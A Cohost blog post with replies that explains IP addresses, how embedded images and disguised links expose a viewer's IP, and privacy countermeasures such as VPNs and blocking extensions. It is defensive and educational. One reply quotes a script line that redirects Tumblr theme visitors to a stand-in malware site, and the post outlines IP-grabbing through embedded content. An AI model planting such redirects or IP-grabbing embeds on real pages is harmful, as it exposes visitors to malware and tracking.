• she/her

queer code witch - 18
discord @‍mintexists
send me asks! :3


boobs
I'm not convinced that this needs to be a link?
Yea no
it doesnt
i wonder if
**markdown** formatting *works* no it doesnt thats sad

vallerie
@vallerie

There's a lot of people who are kind of rightfully scared by "did u know ANY POST on cohost can leak wherre u live!!! 🤯" posts doing the round on here, and especially so other sites with strict character limits.

I feel somewhere in the mist of VPN ads taken by clueless YouTubers, and the death (if it was ever born to begin with) of accurate reporting tech reporting, we got lost as to the actual thread model brought about by people getting your IP addres.

So - here's a little primer on IP addresses, how people get them, what that means you for, and some commentary on the commentary

what is an IP address?

  • an IP address is a semi-uniquely linked identifier, designed to designate where little bundles of data should end up on the internet
  • you have a private address - this is generally used for devices on your network talking to each other, without involving the outside world
  • you also have a public address - this is for the outside world to be able to send data to your network
  • it's nice it's called an address, because you can think of it being a little end destination for data

how would someone get my IP address?

  • you give out this identifier when you do anything, at all, on the internet. without it, the internet wouldn't function, because the internet relies on being able to send data bidirectionally, and, know the source
  • this includes any site that you load images from
  • Cohost posts (along with most blogging platforms...) can embed images from other websites
  • however, if you were to visit a unique link - specifically here, load an image from a Cohost post set to private, for example - someone trying to get your IP address could see the one request being made, and, get the address associated
  • most social media sites, and some blogging platforms "solve" this problem away by having you talk directly to their server to load in external data, such that the external website just sees the social media website's IP address

what's the danger in someone having my IP?

  • an IP address kind of gives your unique location, to an extent - the way your IP is truly linked to your location properly is through data brokers selling your IP address along with GPS data collected from various sources (such as apps on your phone)
  • the primary goal of this is for advertisers, but, of course, anyone can buy from databrokers, including a variety of sites which just do fairly accurate reporting on the location related to an IP
  • most ISPs will not give you a constant IP address. generally restarting your router will get you a new IP addressand using a proxy inbetween to load images
  • if you are susceptible to the kind of risk where users having your IP address would pose harm, use some way of routing traffic through another server (such as VPN)

is Cohost unique in "leaking" my IP address?

  • No. You're giving your IP address when you browse the internet, play games online - because, again, any time you use something online, your IP is required

how do I solve this?

  1. Think about if your threat model would be at risk by someone having your IP. For most people, you aren't at risk.
  2. If you are at risk, use a VPN whenever you use the internet, at all times. There's no half assing this, because, whenever you use the internet, your IP is required. (if you use Safari on macOS or iOS, and, pay for iCloud - Apple Private Relay will do this by default without you thinking about it! it's not bulletproof as it doesn't work for other browsers, but it's a good option for casual use. go turn it on!)
  3. If you can't afford a VPN, consider rotating your IP address by rebooting your wifi router frequently. This doesn't solve the issue, but, because an IP address is a pretty broad range when it comes to location, getting a new IP frequently will generally prevent an IP from being linked too specifically for you.
  4. If you can't afford a VPN and can't reboot your router (e.g. living in University dorms) - install a browser extension to block all offsite content. There's multiple options available for this - I've heard good things about uMatrix
  5. If you can't install a browser extension, can't afford a VPN, and can't reboot your router - don't look at content to which only a small audience audience may be looking (IE: following private pages). If enough people look at posts, the IP addresses will just become noise.

how does Cohost solve the image IP-leaking problem?

They uh. Don't. Or, they can, but, it costs a lot of money to run a media proxy in terms of bandwidth - and, being real here, it's like fighting a losing battle. You can just as easily get someone's IP by just embedding a link that looks like one thing, but, is really another https://google.com (<-- this isn't malicious, it'll just take you to a YouTube video) - and, this technique works on any website that allows markdown or adding links to text (including the recently publicly traded Reddit).


You must log in to comment.

in reply to @vallerie's post:

Wait this is the opposite thing, no? If you're pasting an image, tumblr will be hosting it. The question is whether you can create an tag that loads an external image when the post is viewed.

(also that's the same amount easy as cohost, where you can also paste images into the compose box)

When I copy + pasted one of my posts from here into Tumblr, all the images that were hosted here in the post on here were hosted here in the post on Tumblr.

It was weird. No "maybe copy + paste the image" or whatever — it copy + pasted "this image hosted on Cohost".

huhhhh. what OS? this kinda has to be at least in part a behavior of the clipboard, which for me (macos) i believe includes the image data not the html if you "copy image", but (seems to, i think) contain the html if you select a region that includes an image on a webpage and copy.

If you clicked edit, selected the text from the post input, and pasted it into tumblr, then it'd copy the Cohost URLs you used for the images in the post over to Tumblr as you described.

The only way I can think of (not knowing the Tumblr post editor at all but assuming it supports this) to copy-paste an image at all in that context would be right-clicking images individually, selecting "copy image", and pasting them in one-by-one into the post on Tumblr, which we'd expect to be hosted on Tumblr since you're re-uploading them that way.

I don't think a lot of lay-users knew you could do this with external images, tbh (I certainly didn't). Even the kind of relatively tech-savvy users who know what a media server even is (moi) and I dont wanna think about how small that demographic has gotten
(also, you definitely can, but I'm not sure if tumblr has a media proxy or not? I dont have an account anymore to investigate myself/wouldn't really know how to/its early and I havent had coffee yet)

I don't believe you can on Tumblr posts - I think they just get silently copied into the site.

But - I think you could in Tumblr themes (at least, you used to be able to 10 years ago!) -- and, being real, Tumblr themes are just webpages in themselves, so you can just do <script>document.location = "https://my-fav-malware.site"</script> if you wanted to be evil about it. or at least, you used to be able to. maybe they fixed this!

On IP logging - I wouldn't be shocked if Tumblr uses some kind of media proxy for custom themes, but, I also wouldn't be shocked if they don't - if only because tumblr is fundamentally a blogging platform with some social media tacked on.

Just getting people to click on something, even if it doesn't result in an IP address, sometimes is all the information a person needs.

Anyone who has played EVE Online a while knows to not click on links in wormhole space.

For the uninitiated, wormhole space is like a pocket universe disconnected from the main in-game network, and thus the player doesn't get a list of other players in that pocket.

One of the easiest ways to figure out if you're alone in these spaces or not is to simply post a link to some random imgur pic, and then watch for the view count to increment.

Any interaction with an outside network whatsoever can be a tell, if not for a location, then for something else. Threat models should be adjusted accordingly.

That said, unless you're about to dump state secrets or live in a country that loves to stone queer people to death, your countermeasures don't need to be elaborate. Most people really work themselves up over nothing, and they can often draw attention to themselves by poorly implementing countermeasures instead of just blending in with the crowd.

i adore stories about EVE Online because it's like. yeah of course the spaceship game makes you think about this kind of thing.

and on the last paragraph - I love Tom Scott's bit about "if you're gay, a pirate, an assassin, or a gay pirate assassin" because it's such a good way to explain this kinda stuff.

Had a middle school buddy whose prized possession he'd show off to select friends like a trove of woods porn was his copy of nmap, I'm fairly positive he'd yell shit like that while pinging his enemies

Pinned Tags